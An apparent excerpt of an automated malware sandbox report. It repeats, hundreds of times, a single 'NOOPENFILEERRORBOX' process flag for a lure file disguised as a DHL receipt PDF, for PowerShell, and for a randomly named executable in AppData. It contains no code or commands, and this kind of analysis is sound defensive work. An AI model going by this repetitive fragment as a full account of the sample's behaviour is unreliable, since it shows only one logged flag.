                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                Source: C:\Users\user\AppData\Roaming\AYBPplggzXaXav.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
